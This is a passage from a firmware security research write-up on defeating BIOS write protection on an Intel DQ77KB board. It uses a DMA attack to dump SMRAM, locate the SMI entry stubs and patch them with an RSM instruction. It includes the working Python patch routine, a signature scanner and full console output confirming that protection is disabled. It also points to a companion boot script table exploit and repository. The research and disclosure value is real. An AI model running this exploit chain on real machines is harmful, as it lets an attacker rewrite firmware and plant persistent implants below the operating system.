[+] Reading physical memory 0xd76cc000 - 0xd76e9fff
[+] Reading physical memory 0xd76ea000 - 0xd7707fff
[+] Reading physical memory 0xd7708000 - 0xd7725fff
[+] Reading physical memory 0xd7726000 - 0xd7743fff
[+] Reading physical memory 0xd7744000 - 0xd7761fff
[+] Reading physical memory 0xd7762000 - 0xd777ffff
[+] Reading physical memory 0xd7780000 - 0xd779dfff
[+] Reading physical memory 0xd779e000 - 0xd77bbfff
[+] Reading physical memory 0xd77bc000 - 0xd77d9fff
[+] Reading physical memory 0xd77da000 - 0xd77f7fff
[+] Reading physical memory 0xd77f8000 - 0xd77fffff
[+] DONE

Mysterious SMI entries


Now, when we able to read and write SMRAM contents, we can patch it’s code to prevent BIOSWE bit reset from within the SMM code.

As you may know from Volume 3: System Programming Guide of Intel® 64 and IA-32 Architectures Software Developer’s Manual, when processor is switching to System Management Mode it starts to execute SMI handler code that located at fixed offset 0x8000 from the beginning of the SMRAM:


So, to successfully set BIOSWE bit from operating system the only one thing that we need to do — patch SMI handler code with RSM instruction that exits from SMM back to the OS. On my test hardware I met some really weird things while trying to do that: when I opened TSEG region dump in hex editor and checked 0x8000 offset — I figured that data located there doesn’t looks like valid executable code at all:
localhost ~ # hexdump -C --skip 0x8000 --length 0x100 TSEG.bin
00008000  00 10 00 00 00 00 00 00  00 00 0a 00 00 00 00 00  |................|
00008010  ee 03 00 00 00 00 00 00  b6 d7 15 77 34 b0 ff 97  |...........w4...|
00008020  83 46 8f 3f 79 14 d9 c5  99 94 82 dc ff e0 da bf  |.F.?y...........|
00008030  c3 5b 2d 31 28 93 71 06  54 7d 64 20 8c 9a a3 82  |.[-1(.q.T}d ....|
00008040  bf 6b a2 e0 6a 13 4b 99  3c a2 c3 58 0a 3a 7b 8f  |.k..j.K.<..X.:{.|
00008050  2d 24 cb 56 8e 4e b9 38  20 b3 4d 9c 4d 1a 58 8f  |-$.V.N.8 .M.M.X.|
00008060  ce a9 3a 51 f6 6c 05 57  7b 2f 60 13 5b 5d d3 b4  |..:Q.l.W{/`.[]..|
00008070  a5 05 0f 07 ec c5 88 d1  91 5e 95 0a 21 11 ee 5a  |.........^..!..Z|
00008080  8a 7f 0b a3 3b da f8 62  5c 56 e2 b7 4d 50 c2 e7  |....;..b\V..MP..|
00008090  1e a7 41 cd 1e 6c ea f9  de 36 a1 05 6e 08 d2 8b  |..A..l...6..n...|
000080a0  1b 90 e1 d4 cf 61 02 ff  6b c4 fb fe c3 74 84 f5  |.....a..k....t..|
000080b0  27 63 5d ac 90 dd 2d 01  d4 4a a4 39 6c 97 53 84  |'c]...-..J.9l.S.|
000080c0  87 6d 1c 33 e4 dd 8c cc  1c 40 d3 05 82 d6 3f a1  |.m.3.....@....?.|
000080d0  77 a2 ce 44 18 4f 72 b1  48 52 f9 ae 17 d2 75 fb  |w..D.Or.HR....u.|
000080e0  16 7f 54 d8 40 88 de 0b  89 7f 19 1a 67 c9 cd fe  |..T.@.......g...|
000080f0  45 3f 7f 98 54 89 d4 03  11 69 55 b1 c1 8c 1e 5c  |E?..T....iU....\|

To investigate this thing I downloaded Board Support Package for Quark (relatively modern SoC from Intel) that contains open source implementation of UEFI compatible board firmware. Among other things, Quark BSP also has some System Management Mode code — it’s pretty limited and doesn’t support x86_64 systems, but it still able to tell us some useful information. That’s how SMI entry looks inside Quark BSP source file IA32FamilyCpuBasePkg/PiSmmCpuDxeSmm/Ia32/SmiEntry.asm:
_SmiEntryPoint  PROC
    DB      0bbh                        ; mov bx, imm16
    DW      offset _GdtDesc - _SmiEntryPoint + 8000h
    DB      2eh, 0a1h                   ; mov ax, cs:[offset16]
    DW      DSC_OFFSET + DSC_GDTSIZ
    dec     eax
    mov     cs:[edi], eax               ; mov cs:[bx], ax
    DB      66h, 2eh, 0a1h              ; mov eax, cs:[offset16]
    DW      DSC_OFFSET + DSC_GDTPTR
    mov     cs:[edi + 2], ax            ; mov cs:[bx + 2], eax
    mov     bp, ax                      ; ebp = GDT base
    DB      66h
    lgdt    fword ptr cs:[edi]          ; lgdt fword ptr cs:[bx]
    DB      66h, 0b8h                   ; mov eax, imm32
gSmiCr3     DD      ?
    mov     cr3, eax
    DB      66h
    mov     eax, 020h                   ; as cr4.PGE is not set here, refresh cr3
    mov     cr4, eax                    ; in PreModifyMtrrs() to flush TLB.
    DB      2eh, 0a1h                   ; mov ax, cs:[offset16]
    DW      DSC_OFFSET + DSC_CS
    mov     cs:[edi - 2], eax           ; mov cs:[bx - 2], ax
    DB      66h, 0bfh                   ; mov edi, SMBASE
gSmbase    DD    ?
    DB      67h
    lea     ax, [edi + (@32bit - _SmiEntryPoint) + 8000h]
    mov     cs:[edi - 6], ax            ; mov cs:[bx - 6], eax
    mov     ebx, cr0
    DB      66h
    and     ebx, 9ffafff3h
    DB      66h
    or      ebx, 80000023h
    mov     cr0, ebx
    DB      66h, 0eah
    DD      ?
    DW      ?
_GdtDesc    FWORD   ?
@32bit:

    ;
    ; 32-bit SMI handler code goes here 
    ;

Execution of SMI handler starts in 16-bit environment similar to real mode, code that was listed above performs basic initialization of execution environment and jumps to 32-bit protected mode where the most of SMM stuff is actually runs.

Using this information I wrote a Python program that finds SMI entries inside my TSEG dump using simple signature by it’s 16-bit code stub:
import sys, os, struct

#
# Extract SMI entries information from SMRAM dump.
#
def find_smi_entry(data):

    #
    # Standard SMI entry stub signature
    #
    ptr = 0
    sig = [ '\xBB', None, '\x80',                   # mov     bx, 80XXh
            '\x66', '\x2E', '\xA1', None, '\xFB',   # mov     eax, cs:dword_FBXX
            '\x66', None, None,                     # mov     edx, eax
            '\x66', None, None ]                    # mov     ebp, eax

    while ptr < len(data):

        found = True
        for i in range(len(sig)):

            # check for signature at each 100h offset of SMRAM
            if sig[i] is not None and sig[i] != data[ptr + i]:

                found = False
                break

        if found:

            print 'SMI entry found at 0x%x' % ptr

        ptr += 0x100

def main():   

    find_smi_entry(open(sys.argv[1], 'rb').read())
    return 0

if __name__ == '__main__':

    sys.exit(main())

This program was successfully able to find four different occurrences of the handler code which looks pretty sane — one dedicated SMI entry for each CPU core:
localhost ~ # python smi_entry.py TSEG.bin
SMI entry at 0x3f6800
SMI entry at 0x3f7000
SMI entry at 0x3f7800
SMI entry at 0x3f8000

That’s how disassembled SMI entry looks on my Intel DQ77KB motherboard:
;
; 16-bit SMI entry stub that enables protected mode
;
mov     bx, 8091h           ; Get GDT descriptor address
mov     eax, cs:0FB48h      ; Get physical address of new GDT
mov     edx, eax
mov     ebp, eax
add     edx, 50h
mov     [eax+42h], dx       ; Initialize GDT entry
shr     edx, 10h
mov     [eax+44h], dl
mov     [eax+47h], dh
mov     ax, cs:0FB50h
dec     ax
mov     cs:[bx], ax          ; Set GDT limit
mov     eax, cs:0FB48h
mov     cs:[bx+2], eax       ; Set GDT physical address
db      66h
lgdt    fword ptr cs:[bx]    ; Switch to the new GDT
mov     eax, 0D73CB000h
mov     cr3, eax             ; Set page directory base
mov     eax, 668h
mov     cr4, eax             ; Enable PAE
mov     ax, cs:0FB14h       
mov     cs:[bx+48h], ax      ; Patch long mode jump with CS segment selector
mov     ax, 10h
mov     cs:[bx-2], ax        ; Patch protected mode jump with CS segment selector
mov     edi, cs:0FEF8h       
lea     eax, [edi+80DBh]     ; Get 64-bit stub address
mov     cs:[bx+44h], eax     ; Patch long mode jump with given address
lea     eax, [edi+8097h]     ; Get 32-bit stub address
mov     cs:[bx-6], eax       ; Patch protected mode jump with given address
mov     ecx, 0C0000080h      ; IA32_EFER MSR number
mov     ebx, 23h
mov     cr0, ebx             ; Enable protected mode
jmp     large far ptr 10h:0D73F6897h ; Jump to the protected mode code

;
; 32-bit SMI entry stub that enables long mode
;
mov     ax, 18h              
mov     ds, ax               ; Update protected mode segment registers
mov     es, ax
mov     ss, ax
mov     al, 1

loc_D73F68A3:

xchg    al, [ebp+8]
cmp     al, 0
jz      short loc_D73F68AE
pause
jmp     short loc_D73F68A3

loc_D73F68AE:

mov     eax, ebp
mov     edx, eax
mov     dl, 89h
mov     [eax+45h], dl
mov     eax, 40h
ltr     ax
mov     al, 0
xchg    al, [ebp+8]
rdmsr                        ; Read current IA32_EFER MSR value
or      ah, 1                ; Set long mode enabled flag
wrmsr                        ; Update IA32_EFER MSR value
mov     ebx, 80000023h
mov     cr0, ebx             ; Enable paging
db      67h
jmp     far ptr 38h:0D73F68DBh ; Jump to the long mode code

;
; 64-bit SMI entry stub that calls UEFI SMM foundation code
;
lea     ebx, [edi+0FB00h]
mov     ax, [rbx+16h]
mov     ds, ax               ; Update long mode segment registers
mov     ax, [rbx+1Ah]
mov     es, ax
mov     fs, ax
mov     gs, ax
mov     ax, [rbx+18h]
mov     ss, ax
mov     rsp, 0D73D4FF8h
mov     rcx, [rsp]
mov     rax, 0D70044E4h
sub     rsp, 208h
fxsave  qword ptr [rsp]      ; Save FPU registers
add     rsp, 0FFFFFFFFFFFFFFE0h
call    rax                  ; sub_D70044E4() that does SMI handling stuff
add     rsp, 20h
fxrstor qword ptr [rsp]      ; Restore FPU registers
rsm  

Unfortunately, I haven’t figured why exactly my motherboard firmware SMI entry is located at such strange offset instead of 0x8000 as it should be in according to all of the publicly available documentation. I can assume, that it might be related somehow with Sandy Bridge, because my other test system that has hardware of the same generation (Apple MacBook Pro 10,2) also has the same weird SMI offsets. If you have any information that might shed some light on this question — please let me know :)

SMI entry patching


Now, when it’s clear how to find SMI entry addresses, we can implement the code that uses DMA attack to patch these entries with RSM instruction to achieve BOISWE bit enable:
# RSM + NOP patch for SMI entry
SMI_ENTRY_PATCH = '\x0F\xAA\x90'

def patch_smi_entry(smram_addr, smram_size):

    ret = 0
    modified_pages = {}

    print '[+] Dumping SMRAM...'

    # initialize exploit
    expl = dma_expl.DmaExpl(smram_addr)

    try:

        # read all SMRAM contents
        data = expl.read(smram_size)    
        expl.close()

    except Exception, e:

        expl.close()
        raise

    print '[+] Patching SMI entries...'    

    # find SMI handlers offsets
    for ptr in find_smi_entry(data):

        page_offs = ptr & 0xFFF
        page_addr = ptr - page_offs

        # get data for single memory page
        if modified_pages.has_key(page_addr):

            page_data = modified_pages[page_addr]

        else:

            page_data = data[ptr : ptr + dma_expl.PAGE_SIZE]

        # patch first instruction of SMI entry
        page_data = page_data[: page_offs] + SMI_ENTRY_PATCH + \
                    page_data[page_offs + len(SMI_ENTRY_PATCH) :]

        modified_pages[page_addr] = page_data
        ret += 1

    for page_addr, page_data in modified_pages.items():

        # initialize exploit
        expl = dma_expl.DmaExpl(smram_addr + page_addr)

        try:

            # write modified page back to SMRAM
            expl.write(page_data)
            expl.close()            

        except Exception, e:

            expl.close()
            raise

    print '[+] DONE, %d SMI handlers patched' % ret

    return ret

I made a Python program called patch_smi_entry.py that accepts SMRAM address and size as command line arguments, does all the work, and reports BIOS write enabled status.

Check BIOS write protection on normally functioning SMM code:
localhost chipsec # python chipsec_util.py spi disable-wp

[CHIPSEC] Executing command 'spi' with args ['disable-wp']

[CHIPSEC] Trying to disable BIOS write protection..
[-] Couldn't disable BIOS region write protection in SPI flash
[CHIPSEC] (spi disable-wp) time elapsed 0.000

Patch SMI handlers to defeat SMM code:
localhost ~ # python patch_smi_entry.py 0xd7000000 0x800000
[+] BIOS_CNTL is 0x2a
[!] Can't set BIOSWE bit, BIOS write protection is enabled
[+] Dumping SMRAM...
[+] Memory allocated at 0x7f614ee2b000
[+] Physical address is 0xc973f000
Pass 1: parsed user script and 109 library script(s) using 62172virt/36372res/4212shr/32972data kb, in 170usr/10sys/315real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108876virt/84540res/5632shr/79676data kb, in 810usr/440sys/13062real ms.
Pass 3: translated to C into "/tmp/stapi26CgT/stap_06ba24e9748ef9297b5a524f191d9536_7942_src.c" using 108876virt/84684res/5776shr/79676data kb, in 190usr/50sys/251real ms.
Pass 4: compiled C into "stap_06ba24e9748ef9297b5a524f191d9536_7942.ko" in 3550usr/310sys/6154real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Reading physical memory 0xd7000000 - 0xd701dfff
[+] Reading physical memory 0xd701e000 - 0xd703bfff
[+] Reading physical memory 0xd703c000 - 0xd7059fff
[+] Reading physical memory 0xd705a000 - 0xd7077fff
[+] Reading physical memory 0xd7078000 - 0xd7095fff
[+] Reading physical memory 0xd7096000 - 0xd70b3fff
[+] Reading physical memory 0xd70b4000 - 0xd70d1fff
[+] Reading physical memory 0xd70d2000 - 0xd70effff
[+] Reading physical memory 0xd70f0000 - 0xd710dfff
[+] Reading physical memory 0xd710e000 - 0xd712bfff
[+] Reading physical memory 0xd712c000 - 0xd7149fff
[+] Reading physical memory 0xd714a000 - 0xd7167fff
[+] Reading physical memory 0xd7168000 - 0xd7185fff
[+] Reading physical memory 0xd7186000 - 0xd71a3fff
[+] Reading physical memory 0xd71a4000 - 0xd71c1fff
[+] Reading physical memory 0xd71c2000 - 0xd71dffff
[+] Reading physical memory 0xd71e0000 - 0xd71fdfff
[+] Reading physical memory 0xd71fe000 - 0xd721bfff
[+] Reading physical memory 0xd721c000 - 0xd7239fff
[+] Reading physical memory 0xd723a000 - 0xd7257fff
[+] Reading physical memory 0xd7258000 - 0xd7275fff
[+] Reading physical memory 0xd7276000 - 0xd7293fff
[+] Reading physical memory 0xd7294000 - 0xd72b1fff
[+] Reading physical memory 0xd72b2000 - 0xd72cffff
[+] Reading physical memory 0xd72d0000 - 0xd72edfff
[+] Reading physical memory 0xd72ee000 - 0xd730bfff
[+] Reading physical memory 0xd730c000 - 0xd7329fff
[+] Reading physical memory 0xd732a000 - 0xd7347fff
[+] Reading physical memory 0xd7348000 - 0xd7365fff
[+] Reading physical memory 0xd7366000 - 0xd7383fff
[+] Reading physical memory 0xd7384000 - 0xd73a1fff
[+] Reading physical memory 0xd73a2000 - 0xd73bffff
[+] Reading physical memory 0xd73c0000 - 0xd73ddfff
[+] Reading physical memory 0xd73de000 - 0xd73fbfff
[+] Reading physical memory 0xd73fc000 - 0xd7419fff
[+] Reading physical memory 0xd741a000 - 0xd7437fff
[+] Reading physical memory 0xd7438000 - 0xd7455fff
[+] Reading physical memory 0xd7456000 - 0xd7473fff
[+] Reading physical memory 0xd7474000 - 0xd7491fff
[+] Reading physical memory 0xd7492000 - 0xd74affff
[+] Reading physical memory 0xd74b0000 - 0xd74cdfff
[+] Reading physical memory 0xd74ce000 - 0xd74ebfff
[+] Reading physical memory 0xd74ec000 - 0xd7509fff
[+] Reading physical memory 0xd750a000 - 0xd7527fff
[+] Reading physical memory 0xd7528000 - 0xd7545fff
[+] Reading physical memory 0xd7546000 - 0xd7563fff
[+] Reading physical memory 0xd7564000 - 0xd7581fff
[+] Reading physical memory 0xd7582000 - 0xd759ffff
[+] Reading physical memory 0xd75a0000 - 0xd75bdfff
[+] Reading physical memory 0xd75be000 - 0xd75dbfff
[+] Reading physical memory 0xd75dc000 - 0xd75f9fff
[+] Reading physical memory 0xd75fa000 - 0xd7617fff
[+] Reading physical memory 0xd7618000 - 0xd7635fff
[+] Reading physical memory 0xd7636000 - 0xd7653fff
[+] Reading physical memory 0xd7654000 - 0xd7671fff
[+] Reading physical memory 0xd7672000 - 0xd768ffff
[+] Reading physical memory 0xd7690000 - 0xd76adfff
[+] Reading physical memory 0xd76ae000 - 0xd76cbfff
[+] Reading physical memory 0xd76cc000 - 0xd76e9fff
[+] Reading physical memory 0xd76ea000 - 0xd7707fff
[+] Reading physical memory 0xd7708000 - 0xd7725fff
[+] Reading physical memory 0xd7726000 - 0xd7743fff
[+] Reading physical memory 0xd7744000 - 0xd7761fff
[+] Reading physical memory 0xd7762000 - 0xd777ffff
[+] Reading physical memory 0xd7780000 - 0xd779dfff
[+] Reading physical memory 0xd779e000 - 0xd77bbfff
[+] Reading physical memory 0xd77bc000 - 0xd77d9fff
[+] Reading physical memory 0xd77da000 - 0xd77f7fff
[+] Reading physical memory 0xd77f8000 - 0xd77fffff
[+] DONE
[+] Patching SMI entries...
SMI entry found at 0x3f6000
SMI entry found at 0x3f6800
SMI entry found at 0x3f7000
SMI entry found at 0x3f7800
SMI entry found at 0x3f8000
[+] Memory allocated at 0x7f614a470000
[+] Physical address is 0x3ef092000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36352res/4192shr/32976data kb, in 160usr/10sys/172real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84616res/5708shr/79680data kb, in 790usr/200sys/995real ms.
Pass 3: translated to C into "/tmp/stapEg28Q9/stap_b74b06d8681a8605cef014148ae17b5b_7943_src.c" using 108880virt/84744res/5836shr/79680data kb, in 180usr/60sys/237real ms.
Pass 4: compiled C into "stap_b74b06d8681a8605cef014148ae17b5b_7943.ko" in 3530usr/280sys/5236real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Writing physical memory 0xd73f6000 - 0xd73f6fff
[+] DONE
[+] Memory allocated at 0x7f614ee2b000
[+] Physical address is 0x3f3bcf000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36284res/4124shr/32976data kb, in 160usr/10sys/173real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84532res/5628shr/79680data kb, in 790usr/200sys/995real ms.
Pass 3: translated to C into "/tmp/stapaurR1A/stap_f296db5c81c5158e1ac0e155bbaaf3b6_7943_src.c" using 108880virt/84660res/5756shr/79680data kb, in 180usr/60sys/233real ms.
Pass 4: compiled C into "stap_f296db5c81c5158e1ac0e155bbaaf3b6_7943.ko" in 3530usr/260sys/6606real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Writing physical memory 0xd73f7000 - 0xd73f7fff
[+] DONE
[+] Memory allocated at 0x7f614a470000
[+] Physical address is 0x3ef096000
Pass 1: parsed user script and 109 library script(s) using 62176virt/36396res/4236shr/32976data kb, in 160usr/10sys/172real ms.
Pass 2: analyzed script: 1 probe(s), 14 function(s), 4 embed(s), 2 global(s) using 108880virt/84656res/5752shr/79680data kb, in 790usr/200sys/997real ms.
Pass 3: translated to C into "/tmp/stapXeWg7I/stap_5ab1311d1369a5f00c3287bf44fa61aa_7943_src.c" using 108880virt/84784res/5880shr/79680data kb, in 190usr/50sys/236real ms.
Pass 4: compiled C into "stap_5ab1311d1369a5f00c3287bf44fa61aa_7943.ko" in 3530usr/270sys/4677real ms.
Pass 5: starting run.
[+] SystemTap script started
[+] Writing physical memory 0xd73f8000 - 0xd73f8fff
[+] DONE
[+] DONE, 4 SMI handlers patched
[+] BIOS_CNTL is 0x2a
[+] BIOSWE bit was set, BIOS write protection is disabled now

Verify that BIOS write protection is disabled now:
localhost chipsec # python chipsec_util.py spi disable-wp

[CHIPSEC] Executing command 'spi' with args ['disable-wp']

[CHIPSEC] Trying to disable BIOS write protection..
[+] BIOS region write protection is disabled in SPI flash
[CHIPSEC] (spi disable-wp) time elapsed 0.000

Please note, that before running DMA attack code you also need to run boot_script_table CHIPSEC module to exploit UEFI boot script table vulnerability and disable TSEGMB protection, in other case — execution of patch_smi_entry.py or dma_expl.py can lead to unexpected behaviour (for example, freeze your system) during properly locked SMRAM read or write attempt.

To play with this attack on my test hardware in more convenient way I installed Gentoo Linux with properly configured kernel on USB flash drive and copied there CHIPSEC code with all of the necessary stuff.

Running dma_expl.py on MacBook Pro

My Apple MacBook Pro 10,2 (that also has UEFI boot script table vulnerability) is immune to SMI entry patch because instead of BIOS_CNTL it implements flash write protection using SPI Protected Range registers that not relies on SMM at all. However, dma_expl.py program supports this Apple hardware and I was able to dump it's SMRAM contents which might be useful for other research purposes like security audit of SMM code.

Appendix


Some time ago there was two similar works about SMM code vulnerabilities: "A New Class of Vulnerabilities in SMI Handlers" by Intel Security and "How Many Million BIOSes Would you Like to Infect?" by LegbaCore. Authors of these works discovered a lot of vulnerabilities in software SMI handlers that was registered by firmware code using EFI_SMM_SW_DISPATCH2_PROTOCOL, such handlers can be triggered by operating system with writing a handler number into the AMPC I/O port B2h.

To audit SMM code of my machines for such class of vulnerabilities I also made a two Python scripts that reads dumped SMRAM contents and finds all of the registered SW SMI handlers with it's numbers. Probably, you also might find it useful.

For Intel DQ77KB:
'''
Extract SW SMI handlers information from SMRAM dump.
Example:

$ python smi_handlers.py TSEG.bin
0xcc: 0xd70259d8
0xb8: 0xd706673c
0xba: 0xd706e970
0x05: 0xd706b474
0x04: 0xd706b45c
0x03: 0xd706b2e0
0x01: 0xd706b2dc
0xa1: 0xd70664c4
0xa0: 0xd706636c
0x40: 0xd70254f8

'''
import sys, os, struct

def main():

    path = sys.argv[1]
    data = open(path, 'rb').read()

    for i in range(len(data)):

        # get range from string
        data_at = lambda offs, size: data[i + offs : i + offs + size]

        #
        # 00: "SMIH"
        # 04: handler address (qword)
        # 0c: SW SMI value (byte)
        #
        if data_at(0, 4) == 'SMIH':

            addr, val = struct.unpack('QB', data_at(4, 8 + 1))

            if val != 0 and addr < 0xffffffff:

                print '0x%.2x: 0x%.8x' % (val, addr)


if __name__ == '__main__':

    sys.exit(main())

For Apple MacBookPro 10,2:
'''
Extract SW SMI handlers information from SMRAM dump.
Example:

$python smi_handlers.py TSEG.bin
0x25: 0x893aaca0
0x48: 0x893a3170
0x01: 0x893a831c
0x05: 0x893a7fa0
0x03: 0x893a7e46
0xf1: 0x893a7dd5
0xf0: 0x893a7b76

'''
import sys, os, struct

def main():

    path = sys.argv[1]
    data = open(path, 'rb').read()    

    for i in range(len(data)):

        # get range from string
        data_at = lambda offs, size: data[i + offs : i + offs + size]

        #
        # 00: "DBRC"
        # 68: handler address (qword)
        # 70: SW SMI value (byte)
        #
        if data_at(0, 4) == 'DBRC':

            addr = struct.unpack('Q', data_at(0x68, 8))[0]
            val = struct.unpack('B', data_at(0x70, 1))[0]

            if val != 0 and addr < 0xffffffff:

                print '0x%.2x: 0x%.8x' % (val, addr)

if __name__ == '__main__':

    sys.exit(main())

I updated GitHub repository of my UEFI boot script table exploit with DMA attack and SMI entry patch code, have a fun :)